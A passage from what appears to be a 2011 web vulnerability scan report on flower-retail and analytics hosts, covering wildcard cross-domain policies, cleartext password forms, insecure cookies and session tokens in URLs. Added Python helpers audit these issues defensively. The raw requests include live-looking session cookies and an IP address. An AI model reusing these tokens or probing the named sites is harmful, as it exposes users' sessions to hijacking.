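<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*" />
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true" />
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

if __name__ == "__main__":
    for label, fn, body in [("flash open", audit_flash_policy, FLASH_OPEN),
                            ("flash scoped", audit_flash_policy, FLASH_SCOPED),
                            ("flash named", audit_flash_policy, FLASH_NAMED),
                            ("silverlight open", audit_silverlight_policy, SILVERLIGHT_OPEN)]:
        print(label, fn(body))
```

The severity alone understates a policy like the Omniture ones at 5.11, 5.17, 6.3 and 6.4: domain="*" combined with allow-http-request-headers-from headers="*" (or http-request-headers="*") means any page on the web can make a credentialed request carrying arbitrary headers and read the response, so the findings list is what to act on, not just the rating. To run it against a live host, fetch the two policy files with any HTTP client and pass the body text in; a leading BOM is stripped before parsing.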


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 09 May 2011 01:09:32 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 01:18:23 GMT
Date: Mon, 09 May 2011 01:18:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.3. http://metrics.ftd.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:40 GMT
Server: Omniture DC/2.0.0
xserver: www394
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.4. http://wa.proflowers.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 12:08:30 GMT
Server: Omniture DC/2.0.0
xserver: www10
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ftd.com/ (the form's action attribute is empty, so it resolves to the page URL itself)

The form contains the following password fields:

password
password_ver

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
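The check behind this finding, as an added example (Python; not code from the report or from ftd.com): it resolves each form's action against the page URL the way a browser does, so an empty action posts back to the page itself, and flags every form that carries an <input type="password"> whose resolved action is not https. The HTML is constructed to mirror the create_account form quoted in the response below, with an assumed https sign-in form on example.com and a search form as contrasts.

```python
"""Find forms that would submit a password over clear-text HTTP.

Added example; not code from the report. The sample HTML is constructed
to mirror the create_account form quoted from www.ftd.com, plus two
forms that must not be flagged (https action; no password field).
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect every form with its action and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "form": a.get("name") or a.get("id") or "",
                "action": a.get("action") or "",      # "" means the page URL
                "password_fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password_fields"].append(a.get("name") or a.get("id") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def find_cleartext_password_forms(page_url: str, html: str) -> list:
    """Return the forms whose password fields would be posted over http."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    flagged = []
    for form in scanner.forms:
        if not form["password_fields"]:
            continue
        target = urljoin(page_url, form["action"])     # browser-style resolution
        if urlsplit(target).scheme.lower() != "https":
            flagged.append({"form": form["form"], "action": target,
                            "password_fields": form["password_fields"]})
    return flagged


# Constructed sample page (see the docstring); example.com is assumed.
SAMPLE_HTML = """
<form name="create_account" id="create_account" method="post" action=""
      onsubmit="FS.create_account(); return false;">
  <input type="text" name="email" id="email"/>
  <input type="password" name="password" id="password" maxlength="18"/>
  <input type="password" name="password_ver" id="password_ver" maxlength="18"/>
</form>
<form name="signin" method="post" action="https://www.example.com/checkoutsignin.do">
  <input type="password" name="pw"/>
</form>
<form name="search" method="get" action="/search">
  <input type="text" name="q"/>
</form>
"""

if __name__ == "__main__":
    for hit in find_cleartext_password_forms("http://www.ftd.com/", SAMPLE_HTML):
        print(hit)
```

One caveat the static check cannot see: the quoted ftd.com form's onsubmit handler calls FS.create_account() and returns false, so the browser never performs the native POST and the real destination is whatever that script requests. The finding is still valid for any client with scripting disabled or a script error, but confirm the actual request in the proxy before rating the live path.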

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

8. SSL cookie without secure flag set
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://accounts.proflowers.com/Default.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...

8.2. https://ww30.1800flowers.com/checkoutsignin.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...

8.3. https://ww30.1800flowers.com/continueasguest.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /continueasguest.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1
Content-Length: 9

x=74&y=15

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XbGXHrF9nwuNJodRv3iY_Xi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 1142175


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...

8.4. https://accounts.proflowers.com/CustomerLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...

9. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=a396cc33-4aff-4879-b5e0-d9ab5133031a&hostname=ww30.1800baskets.com&location=%2Fproduct.do&url=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&sessionID=1304903444417.89540&fpc=bbc31a8-12fd24e67c1-26d7039-1&ts1304903453529.0&r_sessionID=&hash_flag=&shr=&count=0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 09 May 2011 01:18:04 GMT
Connection: keep-alive


9.2. http://sales.liveperson.net/hc/87011923/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/87011923/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/87011923/?&visitor=16601209214853&msessionkey=2552283548708337271&siteContainer=STANDALONE&site=87011923&cmd=mTagStartPage&lpCallId=891961844870-933812497416&protV=20&lpjson=1&page=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&id=384168620&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=800-chat-sales-english&activePlugin=none&cobrowse=true&PV%21unit=800-chat-sales&PV%21pageid=product&PV%21visitorActive=1&SV%21language=english&VV%21VisitorID=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618&title=Fields%20of%20Europe%u2122%20for%20Spring%20from%201-800-FLOWERS.COM-91637&referrer=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305&cobrowse=true&cookie=FSESSIONID%3D847b741e4593439b8e3ed6040ba46630%3B%20brandCode%3D1001%3B%20ShopperManagerEnterprise%3Daed35ad7-54a3-48bc-a8e0-0c9f3d76e618%3B%20__utmz%3D1.1304902847.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20cmTPSet%3DY%3B%20CMAVID%3D70091303843240316067555%3B%20JSESSIONID%3D0000vYqYqATbr9y3gSABi7eMNL4%3A-1%3B%20__utma%3D1.2024771767.1304902847.1304902847.1304902847.1%3B%20__utmc%3D1%3B%20__utmb%3D1.4.10.1304902847%3B%20CoreAt%3D90074784%3D1%7C4%7C0%7C0%7C0%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C1%7C1304902859%7C1_%7C1561_%26%3B%2087011923-VID%3D16601209214853%3B%2087011923-SKEY%3D2552283548708337271%3B%20HumanClickSiteContainerID_87011923%3DSTANDALONE HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 09 May 2011 01:02:01 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"891961844870-933812497416","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

9.3. http://t.p.mybuys.com/webrec/wr.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webrec/wr.do?client=FTD&sessionId=544E1284-8127-56AF-A20F-90F1DFEB835D&ns=1&pt=h&mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3&lang=en&v=4.7.3&mbts=1304902834941&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=9D2A178B4C8160F5F1DD7DA8663002AD; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=wQ4lB1nLaBF6/m4UPcv42F1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 27-May-2079 04:14:44 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

10. Password field submitted using GET method
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

